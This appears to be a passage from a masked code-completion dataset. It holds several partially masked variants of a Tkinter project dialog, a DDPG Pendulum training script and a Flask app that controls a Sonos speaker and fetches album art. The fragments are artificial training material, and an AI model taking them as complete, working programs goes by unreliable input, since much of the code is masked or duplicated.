validate(self):\n width = self.form.values[1]\n height = self.form.values[2]\n if width <= 0 or height <= 0:\n boring.dialog.MessageBox.warning(parent=self, title=\n 'Wrong data', message='Invalid width/height')\n return False\n if not self.form.values[0]:\n boring.dialog.MessageBox.warning(parent=self, title=\n 'Project title', message='Invalid project name')\n return False\n return True\n",
"step-5": "import boring.dialog\nimport boring.form\n\nFORMSTRING = '''\nProject name@string\nWidth@int|Height@int\nBackground color@color\nFullscreen@check\n'''\n\nclass NewProjectWindow(boring.dialog.DefaultDialog):\n def __init__(self, master, _dict=None):\n self._dict = _dict\n self.output = None\n boring.dialog.DefaultDialog.__init__(self, master)\n\n def body(self, master):\n initial_values = [\n '',\n 640, 480,\n '#dadada',\n False\n ]\n if self._dict:\n initial_values = [\n self._dict.get('name'),\n self._dict.get('width'), self._dict.get('height'),\n self._dict.get('bgcolor'),\n self._dict.get('fullscreen')\n ]\n self.form = boring.form.FormFrame(master, FORMSTRING, initial_values=initial_values, title='%s Project' % ('Edit' if self._dict else 'New'))\n self.form.grid(pady=10, padx=10)\n\n return self.form.inputs[0]\n\n def apply(self):\n '''\n called when ok button is pressed\n '''\n self.output = {\n 'name': self.form.values[0],\n 'width': self.form.values[1],\n 'height': self.form.values[2],\n 'bgcolor': self.form.values[3],\n 'fullscreen': self.form.values[4]\n }\n\n def validate(self):\n width = self.form.values[1]\n height = self.form.values[2]\n if width <= 0 or height <= 0:\n boring.dialog.MessageBox.warning(parent=self,\n title='Wrong data',\n message='Invalid width/height')\n return False\n if not self.form.values[0]:\n boring.dialog.MessageBox.warning(parent=self,\n title='Project title',\n message='Invalid project name')\n return False\n return True",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def main():
env = gym.make('Pendulum-v0')
log_dir = 'log/pendulum'
agent = DDPG(env, sigma=0.2, num_episodes=250, buffer_size=1000000,
batch_size=64, tau=0.001, batch_norm=False, merge_layer=0)
agent.train()
agent.eval_all(log_dir + '/models', num_eps=10)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def main():
env = gym.make('Pendulum-v0')
log_dir = 'log/pendulum'
agent = DDPG(env, sigma=0.2, num_episodes=250, buffer_size=1000000,
batch_size=64, tau=0.001, batch_norm=False, merge_layer=0)
agent.train()
agent.eval_all(log_dir + '/models', num_eps=10)
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
import gym
from ddpg import DDPG
def main():
env = gym.make('Pendulum-v0')
log_dir = 'log/pendulum'
agent = DDPG(env, sigma=0.2, num_episodes=250, buffer_size=1000000,
batch_size=64, tau=0.001, batch_norm=False, merge_layer=0)
agent.train()
agent.eval_all(log_dir + '/models', num_eps=10)
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
import gym
from ddpg import DDPG
def main():
#env = gym.make('LunarLanderContinuous-v2')
#log_dir = 'log/lander'
env = gym.make('Pendulum-v0')
log_dir = 'log/pendulum'
# paper settings
# agent = DDPG(env, sigma=0.2, num_episodes=1000, buffer_size=1000000, batch_size=64,
# tau=1e-3, batch_norm=True, merge_layer=2)
# did not work unless I merged action into critic at first layer
# worked btter without batchnorm
agent = DDPG(env, sigma=0.2, num_episodes=250, buffer_size=1000000, batch_size=64,
tau=1e-3, batch_norm=False, merge_layer=0)
agent.train()
agent.eval_all(log_dir+'/models', num_eps=10)
if __name__ == '__main__':
main()
|
flexible
|
{
"blob_id": "153e7e66e2b796d011b78aed102d30e37bb0b80f",
"index": 1374,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n env = gym.make('Pendulum-v0')\n log_dir = 'log/pendulum'\n agent = DDPG(env, sigma=0.2, num_episodes=250, buffer_size=1000000,\n batch_size=64, tau=0.001, batch_norm=False, merge_layer=0)\n agent.train()\n agent.eval_all(log_dir + '/models', num_eps=10)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef main():\n env = gym.make('Pendulum-v0')\n log_dir = 'log/pendulum'\n agent = DDPG(env, sigma=0.2, num_episodes=250, buffer_size=1000000,\n batch_size=64, tau=0.001, batch_norm=False, merge_layer=0)\n agent.train()\n agent.eval_all(log_dir + '/models', num_eps=10)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import gym\nfrom ddpg import DDPG\n\n\ndef main():\n env = gym.make('Pendulum-v0')\n log_dir = 'log/pendulum'\n agent = DDPG(env, sigma=0.2, num_episodes=250, buffer_size=1000000,\n batch_size=64, tau=0.001, batch_norm=False, merge_layer=0)\n agent.train()\n agent.eval_all(log_dir + '/models', num_eps=10)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "import gym\r\nfrom ddpg import DDPG\r\n\r\ndef main():\r\n #env = gym.make('LunarLanderContinuous-v2')\r\n #log_dir = 'log/lander'\r\n\r\n env = gym.make('Pendulum-v0')\r\n log_dir = 'log/pendulum'\r\n\r\n # paper settings\r\n # agent = DDPG(env, sigma=0.2, num_episodes=1000, buffer_size=1000000, batch_size=64, \r\n # tau=1e-3, batch_norm=True, merge_layer=2)\r\n\r\n # did not work unless I merged action into critic at first layer\r\n # worked btter without batchnorm\r\n agent = DDPG(env, sigma=0.2, num_episodes=250, buffer_size=1000000, batch_size=64, \r\n tau=1e-3, batch_norm=False, merge_layer=0)\r\n agent.train()\r\n agent.eval_all(log_dir+'/models', num_eps=10)\r\n\r\nif __name__ == '__main__':\r\n main()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def gen_sig():
"""@brief return the MD5 checksum """
return hashlib.md5((app.config['ROVI_API_KEY'] + app.config[
'ROVI_SHARED_SECRET'] + repr(int(time.time()))).encode('utf-8')
).hexdigest()
def get_track_image(artist, album):
"""@brief get the track image from Rovi """
blank_image = url_for('static', filename='img/blank.jpg')
if 'ROVI_SHARED_SECRET' not in app.config:
return blank_image
if 'ROVI_API_KEY' not in app.config:
return blank_image
headers = {'Accept-Encoding': 'gzip'}
req = requests.get(
'http://api.rovicorp.com/recognition/v2.1/music/match/album?apikey=' +
app.config['ROVI_API_KEY'] + '&sig=' + gen_sig() + '&name= ' +
album + '&performername=' + artist + '&include=images&size=1',
headers=headers, timeout=30)
if req.status_code != requests.codes.ok:
return blank_image
result = json.loads(req.content)
try:
return result['matchResponse']['results'][0]['album']['images'][0][
'front'][3]['url']
except (KeyError, IndexError):
return blank_image
def current_track():
"""@brief get the current track information from Sonos """
track = sonos.get_current_track_info()
track['title'] = track['title'][:30]
track['artist'] = track['artist'][:30]
return track
@app.route('/play')
def play():
"""@brief the play function """
sonos.play()
return 'Ok'
@app.route('/pause')
def pause():
"""@brief the pause function """
sonos.pause()
return 'Ok'
@app.route('/following')
def following():
"""@brief the following function """
sonos.next()
return 'Ok'
@app.route('/previous')
def previous():
"""@brief the previous function """
sonos.previous()
return 'Ok'
@app.route('/volume')
def volume():
"""@brief get the actual volume """
vol = sonos.volume
return vol
@app.route('/volume_up')
def volume_up():
"""@brief the volume up function """
sonos.set_relative_volume(10)
return 'Ok'
@app.route('/volume_down')
def volume_down():
"""@brief the volume down function """
sonos.set_relative_volume(-10)
return 'Ok'
@app.route('/volume_mute')
def volume_mute():
"""@brief the mute function """
sonos.mute = True
return 'Ok'
@app.route('/volume_unmute')
def volume_unmute():
"""@brief the unmute function """
sonos.mute = False
return 'Ok'
<|reserved_special_token_0|>
@app.route('/track_02')
def track_02():
"""@brief switch to new track """
sonos.play_uri('http://streams.radiopsr.de/psr-live/mp3-192/mediaplayer',
title='Radio PSR Live', force_radio=True)
return 'Ok'
<|reserved_special_token_0|>
@app.route('/track_04')
def track_04():
"""@brief switch to new track """
sonos.play_uri('http://stream.sunshine-live.de/live/mp3-192', title=
'Sunshine Live', force_radio=True)
return 'Ok'
@app.route('/info-light')
def info_light():
"""@brief the info-light function """
track = current_track()
return json.dumps(track)
@app.route('/info')
def info():
"""@brief the info function """
track = current_track()
track['image'] = get_track_image(track['artist'], track['album'])
transport = sonos.get_current_transport_info()
track['playing'] = transport['current_transport_state'] != 'STOPPED'
track['mute'] = sonos.mute
return json.dumps(track)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def gen_sig():
"""@brief return the MD5 checksum """
return hashlib.md5((app.config['ROVI_API_KEY'] + app.config[
'ROVI_SHARED_SECRET'] + repr(int(time.time()))).encode('utf-8')
).hexdigest()
def get_track_image(artist, album):
"""@brief get the track image from Rovi """
blank_image = url_for('static', filename='img/blank.jpg')
if 'ROVI_SHARED_SECRET' not in app.config:
return blank_image
if 'ROVI_API_KEY' not in app.config:
return blank_image
headers = {'Accept-Encoding': 'gzip'}
req = requests.get(
'http://api.rovicorp.com/recognition/v2.1/music/match/album?apikey=' +
app.config['ROVI_API_KEY'] + '&sig=' + gen_sig() + '&name= ' +
album + '&performername=' + artist + '&include=images&size=1',
headers=headers, timeout=30)
if req.status_code != requests.codes.ok:
return blank_image
result = json.loads(req.content)
try:
return result['matchResponse']['results'][0]['album']['images'][0][
'front'][3]['url']
except (KeyError, IndexError):
return blank_image
def current_track():
"""@brief get the current track information from Sonos """
track = sonos.get_current_track_info()
track['title'] = track['title'][:30]
track['artist'] = track['artist'][:30]
return track
@app.route('/play')
def play():
"""@brief the play function """
sonos.play()
return 'Ok'
@app.route('/pause')
def pause():
"""@brief the pause function """
sonos.pause()
return 'Ok'
@app.route('/following')
def following():
"""@brief the following function """
sonos.next()
return 'Ok'
@app.route('/previous')
def previous():
"""@brief the previous function """
sonos.previous()
return 'Ok'
@app.route('/volume')
def volume():
"""@brief get the actual volume """
vol = sonos.volume
return vol
@app.route('/volume_up')
def volume_up():
"""@brief the volume up function """
sonos.set_relative_volume(10)
return 'Ok'
@app.route('/volume_down')
def volume_down():
"""@brief the volume down function """
sonos.set_relative_volume(-10)
return 'Ok'
@app.route('/volume_mute')
def volume_mute():
"""@brief the mute function """
sonos.mute = True
return 'Ok'
@app.route('/volume_unmute')
def volume_unmute():
"""@brief the unmute function """
sonos.mute = False
return 'Ok'
@app.route('/track_01')
def track_01():
"""@brief switch to new track """
sonos.play_uri('http://mp3stream1.apasf.apa.at:8000', title=
'FM4.ORF.AT', force_radio=True)
return 'Ok'
@app.route('/track_02')
def track_02():
"""@brief switch to new track """
sonos.play_uri('http://streams.radiopsr.de/psr-live/mp3-192/mediaplayer',
title='Radio PSR Live', force_radio=True)
return 'Ok'
<|reserved_special_token_0|>
@app.route('/track_04')
def track_04():
"""@brief switch to new track """
sonos.play_uri('http://stream.sunshine-live.de/live/mp3-192', title=
'Sunshine Live', force_radio=True)
return 'Ok'
@app.route('/info-light')
def info_light():
"""@brief the info-light function """
track = current_track()
return json.dumps(track)
@app.route('/info')
def info():
"""@brief the info function """
track = current_track()
track['image'] = get_track_image(track['artist'], track['album'])
transport = sonos.get_current_transport_info()
track['playing'] = transport['current_transport_state'] != 'STOPPED'
track['mute'] = sonos.mute
return json.dumps(track)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def gen_sig():
"""@brief return the MD5 checksum """
return hashlib.md5((app.config['ROVI_API_KEY'] + app.config[
'ROVI_SHARED_SECRET'] + repr(int(time.time()))).encode('utf-8')
).hexdigest()
def get_track_image(artist, album):
"""@brief get the track image from Rovi """
blank_image = url_for('static', filename='img/blank.jpg')
if 'ROVI_SHARED_SECRET' not in app.config:
return blank_image
if 'ROVI_API_KEY' not in app.config:
return blank_image
headers = {'Accept-Encoding': 'gzip'}
req = requests.get(
'http://api.rovicorp.com/recognition/v2.1/music/match/album?apikey=' +
app.config['ROVI_API_KEY'] + '&sig=' + gen_sig() + '&name= ' +
album + '&performername=' + artist + '&include=images&size=1',
headers=headers, timeout=30)
if req.status_code != requests.codes.ok:
return blank_image
result = json.loads(req.content)
try:
return result['matchResponse']['results'][0]['album']['images'][0][
'front'][3]['url']
except (KeyError, IndexError):
return blank_image
def current_track():
"""@brief get the current track information from Sonos """
track = sonos.get_current_track_info()
track['title'] = track['title'][:30]
track['artist'] = track['artist'][:30]
return track
@app.route('/play')
def play():
"""@brief the play function """
sonos.play()
return 'Ok'
@app.route('/pause')
def pause():
"""@brief the pause function """
sonos.pause()
return 'Ok'
@app.route('/following')
def following():
"""@brief the following function """
sonos.next()
return 'Ok'
@app.route('/previous')
def previous():
"""@brief the previous function """
sonos.previous()
return 'Ok'
@app.route('/volume')
def volume():
"""@brief get the actual volume """
vol = sonos.volume
return vol
@app.route('/volume_up')
def volume_up():
"""@brief the volume up function """
sonos.set_relative_volume(10)
return 'Ok'
@app.route('/volume_down')
def volume_down():
"""@brief the volume down function """
sonos.set_relative_volume(-10)
return 'Ok'
@app.route('/volume_mute')
def volume_mute():
"""@brief the mute function """
sonos.mute = True
return 'Ok'
@app.route('/volume_unmute')
def volume_unmute():
"""@brief the unmute function """
sonos.mute = False
return 'Ok'
@app.route('/track_01')
def track_01():
"""@brief switch to new track """
sonos.play_uri('http://mp3stream1.apasf.apa.at:8000', title=
'FM4.ORF.AT', force_radio=True)
return 'Ok'
@app.route('/track_02')
def track_02():
"""@brief switch to new track """
sonos.play_uri('http://streams.radiopsr.de/psr-live/mp3-192/mediaplayer',
title='Radio PSR Live', force_radio=True)
return 'Ok'
@app.route('/track_03')
def track_03():
"""@brief switch to new track """
sonos.play_uri('http://nrj.de/sachsen', title='Energy Sachsen',
force_radio=True)
return 'Ok'
@app.route('/track_04')
def track_04():
"""@brief switch to new track """
sonos.play_uri('http://stream.sunshine-live.de/live/mp3-192', title=
'Sunshine Live', force_radio=True)
return 'Ok'
@app.route('/info-light')
def info_light():
"""@brief the info-light function """
track = current_track()
return json.dumps(track)
@app.route('/info')
def info():
"""@brief the info function """
track = current_track()
track['image'] = get_track_image(track['artist'], track['album'])
transport = sonos.get_current_transport_info()
track['playing'] = transport['current_transport_state'] != 'STOPPED'
track['mute'] = sonos.mute
return json.dumps(track)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
app.config.from_pyfile('settings.py')
<|reserved_special_token_0|>
def gen_sig():
"""@brief return the MD5 checksum """
return hashlib.md5((app.config['ROVI_API_KEY'] + app.config[
'ROVI_SHARED_SECRET'] + repr(int(time.time()))).encode('utf-8')
).hexdigest()
def get_track_image(artist, album):
"""@brief get the track image from Rovi """
blank_image = url_for('static', filename='img/blank.jpg')
if 'ROVI_SHARED_SECRET' not in app.config:
return blank_image
if 'ROVI_API_KEY' not in app.config:
return blank_image
headers = {'Accept-Encoding': 'gzip'}
req = requests.get(
'http://api.rovicorp.com/recognition/v2.1/music/match/album?apikey=' +
app.config['ROVI_API_KEY'] + '&sig=' + gen_sig() + '&name= ' +
album + '&performername=' + artist + '&include=images&size=1',
headers=headers, timeout=30)
if req.status_code != requests.codes.ok:
return blank_image
result = json.loads(req.content)
try:
return result['matchResponse']['results'][0]['album']['images'][0][
'front'][3]['url']
except (KeyError, IndexError):
return blank_image
def current_track():
"""@brief get the current track information from Sonos """
track = sonos.get_current_track_info()
track['title'] = track['title'][:30]
track['artist'] = track['artist'][:30]
return track
@app.route('/play')
def play():
"""@brief the play function """
sonos.play()
return 'Ok'
@app.route('/pause')
def pause():
"""@brief the pause function """
sonos.pause()
return 'Ok'
@app.route('/following')
def following():
"""@brief the following function """
sonos.next()
return 'Ok'
@app.route('/previous')
def previous():
"""@brief the previous function """
sonos.previous()
return 'Ok'
@app.route('/volume')
def volume():
"""@brief get the actual volume """
vol = sonos.volume
return vol
@app.route('/volume_up')
def volume_up():
"""@brief the volume up function """
sonos.set_relative_volume(10)
return 'Ok'
@app.route('/volume_down')
def volume_down():
"""@brief the volume down function """
sonos.set_relative_volume(-10)
return 'Ok'
@app.route('/volume_mute')
def volume_mute():
"""@brief the mute function """
sonos.mute = True
return 'Ok'
@app.route('/volume_unmute')
def volume_unmute():
"""@brief the unmute function """
sonos.mute = False
return 'Ok'
@app.route('/track_01')
def track_01():
"""@brief switch to new track """
sonos.play_uri('http://mp3stream1.apasf.apa.at:8000', title=
'FM4.ORF.AT', force_radio=True)
return 'Ok'
@app.route('/track_02')
def track_02():
"""@brief switch to new track """
sonos.play_uri('http://streams.radiopsr.de/psr-live/mp3-192/mediaplayer',
title='Radio PSR Live', force_radio=True)
return 'Ok'
@app.route('/track_03')
def track_03():
"""@brief switch to new track """
sonos.play_uri('http://nrj.de/sachsen', title='Energy Sachsen',
force_radio=True)
return 'Ok'
@app.route('/track_04')
def track_04():
"""@brief switch to new track """
sonos.play_uri('http://stream.sunshine-live.de/live/mp3-192', title=
'Sunshine Live', force_radio=True)
return 'Ok'
@app.route('/info-light')
def info_light():
"""@brief the info-light function """
track = current_track()
return json.dumps(track)
@app.route('/info')
def info():
"""@brief the info function """
track = current_track()
track['image'] = get_track_image(track['artist'], track['album'])
transport = sonos.get_current_transport_info()
track['playing'] = transport['current_transport_state'] != 'STOPPED'
track['mute'] = sonos.mute
return json.dumps(track)
@app.route('/')
@app.route('/index')
def index():
"""@brief the index function """
track = current_track()
track['image'] = get_track_image(track['artist'], track['album'])
return render_template('index.html', track=track)
<|reserved_special_token_1|>
"""@brief the routes for Flask application
"""
import hashlib
import json
import time
import requests
from flask import render_template, url_for
from soco import SoCo
from app import app
app.config.from_pyfile("settings.py")
sonos = SoCo(app.config["SPEAKER_IP"])
def gen_sig():
"""@brief return the MD5 checksum """
return hashlib.md5(
(
app.config["ROVI_API_KEY"]
+ app.config["ROVI_SHARED_SECRET"]
+ repr(int(time.time()))
).encode("utf-8")
).hexdigest()
def get_track_image(artist, album):
"""@brief get the track image from Rovi """
blank_image = url_for("static", filename="img/blank.jpg")
if "ROVI_SHARED_SECRET" not in app.config:
return blank_image
if "ROVI_API_KEY" not in app.config:
return blank_image
headers = {"Accept-Encoding": "gzip"}
req = requests.get(
"http://api.rovicorp.com/recognition/v2.1/music/match/album?apikey="
+ app.config["ROVI_API_KEY"]
+ "&sig="
+ gen_sig()
+ "&name= "
+ album
+ "&performername="
+ artist
+ "&include=images&size=1",
headers=headers,
timeout=30,
)
if req.status_code != requests.codes.ok:
return blank_image
result = json.loads(req.content)
try:
return result["matchResponse"]["results"][0]["album"]["images"][0]["front"][3]["url"]
except (KeyError, IndexError):
return blank_image
def current_track():
"""@brief get the current track information from Sonos """
track = sonos.get_current_track_info()
track["title"] = track["title"][:30]
track["artist"] = track["artist"][:30]
return track
@app.route("/play")
def play():
"""@brief the play function """
sonos.play()
return "Ok"
@app.route("/pause")
def pause():
"""@brief the pause function """
sonos.pause()
return "Ok"
@app.route("/following")
def following():
"""@brief the following function """
sonos.next()
return "Ok"
@app.route("/previous")
def previous():
"""@brief the previous function """
sonos.previous()
return "Ok"
@app.route("/volume")
def volume():
"""@brief get the actual volume """
vol = sonos.volume
return vol
@app.route("/volume_up")
def volume_up():
"""@brief the volume up function """
sonos.set_relative_volume(10)
return "Ok"
@app.route("/volume_down")
def volume_down():
"""@brief the volume down function """
sonos.set_relative_volume(-10)
return "Ok"
@app.route("/volume_mute")
def volume_mute():
"""@brief the mute function """
sonos.mute = True
return "Ok"
@app.route("/volume_unmute")
def volume_unmute():
"""@brief the unmute function """
sonos.mute = False
return "Ok"
@app.route("/track_01")
def track_01():
"""@brief switch to new track """
sonos.play_uri('http://mp3stream1.apasf.apa.at:8000', title='FM4.ORF.AT', force_radio=True)
return "Ok"
@app.route("/track_02")
def track_02():
"""@brief switch to new track """
sonos.play_uri('http://streams.radiopsr.de/psr-live/mp3-192/mediaplayer', title='Radio PSR Live', force_radio=True)
return "Ok"
@app.route("/track_03")
def track_03():
"""@brief switch to new track """
sonos.play_uri('http://nrj.de/sachsen', title='Energy Sachsen', force_radio=True)
return "Ok"
@app.route("/track_04")
def track_04():
"""@brief switch to new track """
sonos.play_uri('http://stream.sunshine-live.de/live/mp3-192', title='Sunshine Live', force_radio=True)
return "Ok"
@app.route("/info-light")
def info_light():
"""@brief the info-light function """
track = current_track()
return json.dumps(track)
@app.route("/info")
def info():
"""@brief the info function """
track = current_track()
track["image"] = get_track_image(track["artist"], track["album"])
transport = sonos.get_current_transport_info()
track["playing"] = transport["current_transport_state"] != "STOPPED"
track["mute"] = sonos.mute
return json.dumps(track)
@app.route("/")
@app.route('/index')
def index():
"""@brief the index function """
track = current_track()
track["image"] = get_track_image(track["artist"], track["album"])
return render_template("index.html", track=track)
|
flexible
|
{
"blob_id": "86f33895e9ae0e026d7d6e40e611796b2dc2c713",
"index": 8394,
"step-1": "<mask token>\n\n\ndef gen_sig():\n \"\"\"@brief return the MD5 checksum \"\"\"\n return hashlib.md5((app.config['ROVI_API_KEY'] + app.config[\n 'ROVI_SHARED_SECRET'] + repr(int(time.time()))).encode('utf-8')\n ).hexdigest()\n\n\ndef get_track_image(artist, album):\n \"\"\"@brief get the track image from Rovi \"\"\"\n blank_image = url_for('static', filename='img/blank.jpg')\n if 'ROVI_SHARED_SECRET' not in app.config:\n return blank_image\n if 'ROVI_API_KEY' not in app.config:\n return blank_image\n headers = {'Accept-Encoding': 'gzip'}\n req = requests.get(\n 'http://api.rovicorp.com/recognition/v2.1/music/match/album?apikey=' +\n app.config['ROVI_API_KEY'] + '&sig=' + gen_sig() + '&name= ' +\n album + '&performername=' + artist + '&include=images&size=1',\n headers=headers, timeout=30)\n if req.status_code != requests.codes.ok:\n return blank_image\n result = json.loads(req.content)\n try:\n return result['matchResponse']['results'][0]['album']['images'][0][\n 'front'][3]['url']\n except (KeyError, IndexError):\n return blank_image\n\n\ndef current_track():\n \"\"\"@brief get the current track information from Sonos \"\"\"\n track = sonos.get_current_track_info()\n track['title'] = track['title'][:30]\n track['artist'] = track['artist'][:30]\n return track\n\n\n@app.route('/play')\ndef play():\n \"\"\"@brief the play function \"\"\"\n sonos.play()\n return 'Ok'\n\n\n@app.route('/pause')\ndef pause():\n \"\"\"@brief the pause function \"\"\"\n sonos.pause()\n return 'Ok'\n\n\n@app.route('/following')\ndef following():\n \"\"\"@brief the following function \"\"\"\n sonos.next()\n return 'Ok'\n\n\n@app.route('/previous')\ndef previous():\n \"\"\"@brief the previous function \"\"\"\n sonos.previous()\n return 'Ok'\n\n\n@app.route('/volume')\ndef volume():\n \"\"\"@brief get the actual volume \"\"\"\n vol = sonos.volume\n return vol\n\n\n@app.route('/volume_up')\ndef volume_up():\n \"\"\"@brief the volume up function \"\"\"\n sonos.set_relative_volume(10)\n return 'Ok'\n\n\n@app.route('/volume_down')\ndef volume_down():\n \"\"\"@brief the volume down function \"\"\"\n sonos.set_relative_volume(-10)\n return 'Ok'\n\n\n@app.route('/volume_mute')\ndef volume_mute():\n \"\"\"@brief the mute function \"\"\"\n sonos.mute = True\n return 'Ok'\n\n\n@app.route('/volume_unmute')\ndef volume_unmute():\n \"\"\"@brief the unmute function \"\"\"\n sonos.mute = False\n return 'Ok'\n\n\n<mask token>\n\n\n@app.route('/track_02')\ndef track_02():\n \"\"\"@brief switch to new track \"\"\"\n sonos.play_uri('http://streams.radiopsr.de/psr-live/mp3-192/mediaplayer',\n title='Radio PSR Live', force_radio=True)\n return 'Ok'\n\n\n<mask token>\n\n\n@app.route('/track_04')\ndef track_04():\n \"\"\"@brief switch to new track \"\"\"\n sonos.play_uri('http://stream.sunshine-live.de/live/mp3-192', title=\n 'Sunshine Live', force_radio=True)\n return 'Ok'\n\n\n@app.route('/info-light')\ndef info_light():\n \"\"\"@brief the info-light function \"\"\"\n track = current_track()\n return json.dumps(track)\n\n\n@app.route('/info')\ndef info():\n \"\"\"@brief the info function \"\"\"\n track = current_track()\n track['image'] = get_track_image(track['artist'], track['album'])\n transport = sonos.get_current_transport_info()\n track['playing'] = transport['current_transport_state'] != 'STOPPED'\n track['mute'] = sonos.mute\n return json.dumps(track)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef gen_sig():\n \"\"\"@brief return the MD5 checksum \"\"\"\n return hashlib.md5((app.config['ROVI_API_KEY'] + app.config[\n 'ROVI_SHARED_SECRET'] + repr(int(time.time()))).encode('utf-8')\n ).hexdigest()\n\n\ndef get_track_image(artist, album):\n \"\"\"@brief get the track image from Rovi \"\"\"\n blank_image = url_for('static', filename='img/blank.jpg')\n if 'ROVI_SHARED_SECRET' not in app.config:\n return blank_image\n if 'ROVI_API_KEY' not in app.config:\n return blank_image\n headers = {'Accept-Encoding': 'gzip'}\n req = requests.get(\n 'http://api.rovicorp.com/recognition/v2.1/music/match/album?apikey=' +\n app.config['ROVI_API_KEY'] + '&sig=' + gen_sig() + '&name= ' +\n album + '&performername=' + artist + '&include=images&size=1',\n headers=headers, timeout=30)\n if req.status_code != requests.codes.ok:\n return blank_image\n result = json.loads(req.content)\n try:\n return result['matchResponse']['results'][0]['album']['images'][0][\n 'front'][3]['url']\n except (KeyError, IndexError):\n return blank_image\n\n\ndef current_track():\n \"\"\"@brief get the current track information from Sonos \"\"\"\n track = sonos.get_current_track_info()\n track['title'] = track['title'][:30]\n track['artist'] = track['artist'][:30]\n return track\n\n\n@app.route('/play')\ndef play():\n \"\"\"@brief the play function \"\"\"\n sonos.play()\n return 'Ok'\n\n\n@app.route('/pause')\ndef pause():\n \"\"\"@brief the pause function \"\"\"\n sonos.pause()\n return 'Ok'\n\n\n@app.route('/following')\ndef following():\n \"\"\"@brief the following function \"\"\"\n sonos.next()\n return 'Ok'\n\n\n@app.route('/previous')\ndef previous():\n \"\"\"@brief the previous function \"\"\"\n sonos.previous()\n return 'Ok'\n\n\n@app.route('/volume')\ndef volume():\n \"\"\"@brief get the actual volume \"\"\"\n vol = sonos.volume\n return vol\n\n\n@app.route('/volume_up')\ndef volume_up():\n \"\"\"@brief the volume up function \"\"\"\n sonos.set_relative_volume(10)\n return 'Ok'\n\n\n@app.route('/volume_down')\ndef volume_down():\n \"\"\"@brief the volume down function \"\"\"\n sonos.set_relative_volume(-10)\n return 'Ok'\n\n\n@app.route('/volume_mute')\ndef volume_mute():\n \"\"\"@brief the mute function \"\"\"\n sonos.mute = True\n return 'Ok'\n\n\n@app.route('/volume_unmute')\ndef volume_unmute():\n \"\"\"@brief the unmute function \"\"\"\n sonos.mute = False\n return 'Ok'\n\n\n@app.route('/track_01')\ndef track_01():\n \"\"\"@brief switch to new track \"\"\"\n sonos.play_uri('http://mp3stream1.apasf.apa.at:8000', title=\n 'FM4.ORF.AT', force_radio=True)\n return 'Ok'\n\n\n@app.route('/track_02')\ndef track_02():\n \"\"\"@brief switch to new track \"\"\"\n sonos.play_uri('http://streams.radiopsr.de/psr-live/mp3-192/mediaplayer',\n title='Radio PSR Live', force_radio=True)\n return 'Ok'\n\n\n<mask token>\n\n\n@app.route('/track_04')\ndef track_04():\n \"\"\"@brief switch to new track \"\"\"\n sonos.play_uri('http://stream.sunshine-live.de/live/mp3-192', title=\n 'Sunshine Live', force_radio=True)\n return 'Ok'\n\n\n@app.route('/info-light')\ndef info_light():\n \"\"\"@brief the info-light function \"\"\"\n track = current_track()\n return json.dumps(track)\n\n\n@app.route('/info')\ndef info():\n \"\"\"@brief the info function \"\"\"\n track = current_track()\n track['image'] = get_track_image(track['artist'], track['album'])\n transport = sonos.get_current_transport_info()\n track['playing'] = transport['current_transport_state'] != 'STOPPED'\n track['mute'] = sonos.mute\n return json.dumps(track)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef gen_sig():\n \"\"\"@brief return the MD5 checksum \"\"\"\n return hashlib.md5((app.config['ROVI_API_KEY'] + app.config[\n 'ROVI_SHARED_SECRET'] + repr(int(time.time()))).encode('utf-8')\n ).hexdigest()\n\n\ndef get_track_image(artist, album):\n \"\"\"@brief get the track image from Rovi \"\"\"\n blank_image = url_for('static', filename='img/blank.jpg')\n if 'ROVI_SHARED_SECRET' not in app.config:\n return blank_image\n if 'ROVI_API_KEY' not in app.config:\n return blank_image\n headers = {'Accept-Encoding': 'gzip'}\n req = requests.get(\n 'http://api.rovicorp.com/recognition/v2.1/music/match/album?apikey=' +\n app.config['ROVI_API_KEY'] + '&sig=' + gen_sig() + '&name= ' +\n album + '&performername=' + artist + '&include=images&size=1',\n headers=headers, timeout=30)\n if req.status_code != requests.codes.ok:\n return blank_image\n result = json.loads(req.content)\n try:\n return result['matchResponse']['results'][0]['album']['images'][0][\n 'front'][3]['url']\n except (KeyError, IndexError):\n return blank_image\n\n\ndef current_track():\n \"\"\"@brief get the current track information from Sonos \"\"\"\n track = sonos.get_current_track_info()\n track['title'] = track['title'][:30]\n track['artist'] = track['artist'][:30]\n return track\n\n\n@app.route('/play')\ndef play():\n \"\"\"@brief the play function \"\"\"\n sonos.play()\n return 'Ok'\n\n\n@app.route('/pause')\ndef pause():\n \"\"\"@brief the pause function \"\"\"\n sonos.pause()\n return 'Ok'\n\n\n@app.route('/following')\ndef following():\n \"\"\"@brief the following function \"\"\"\n sonos.next()\n return 'Ok'\n\n\n@app.route('/previous')\ndef previous():\n \"\"\"@brief the previous function \"\"\"\n sonos.previous()\n return 'Ok'\n\n\n@app.route('/volume')\ndef volume():\n \"\"\"@brief get the actual volume \"\"\"\n vol = sonos.volume\n return vol\n\n\n@app.route('/volume_up')\ndef volume_up():\n \"\"\"@brief the volume up function \"\"\"\n sonos.set_relative_volume(10)\n return 'Ok'\n\n\n@app.route('/volume_down')\ndef volume_down():\n \"\"\"@brief the volume down function \"\"\"\n sonos.set_relative_volume(-10)\n return 'Ok'\n\n\n@app.route('/volume_mute')\ndef volume_mute():\n \"\"\"@brief the mute function \"\"\"\n sonos.mute = True\n return 'Ok'\n\n\n@app.route('/volume_unmute')\ndef volume_unmute():\n \"\"\"@brief the unmute function \"\"\"\n sonos.mute = False\n return 'Ok'\n\n\n@app.route('/track_01')\ndef track_01():\n 